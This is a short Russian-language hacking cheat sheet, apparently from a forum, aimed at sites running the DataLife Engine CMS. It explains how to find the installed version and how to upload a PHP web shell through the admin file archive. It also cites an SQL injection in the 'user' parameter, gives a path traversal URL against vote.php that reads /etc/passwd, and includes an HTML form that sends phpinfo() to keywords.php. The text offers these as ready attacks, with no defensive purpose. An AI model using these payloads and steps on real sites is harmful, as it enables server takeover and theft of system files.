Как узнать установленную версию DLE? 1. Открываем: site.com/engine/ajax/updates.php 2. Смотрим установленную версию Как залить шелл в DLE v4.1-8.2? Итак, заходим в админцентр. Далее нажимаем "Другие разделы" Выбираем где-то в конце "Архив файлов" Идём на "Настройка Архива Файлов" Допустимые форматы файлов: дописываем php. Сохраняемся, идём в "Добавить файл". Заливаем шелл Его дальше видно в разделе "Файловый Архив" для всех и в свойствах загруженного файла в редактировании файлов в админке. Автор способа: desTiny DataLife Engine <= v4.1 sql-inj Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php. DataLife Engine <= v4.2 http ://dle.com/engine/ajax/vote.php?vote_action=results&vote_skin=../../../. ./../../../../../../../etc/passwd� Раскрытие полного установочного пути: Код <form name="eval" action="http://site.com/upload/engine/ajax/keywords.php" method="post"> <input type="text" name="text" value="phpinfo();"><br /> <input type="submit" name="submit" value="zapros"> </form>
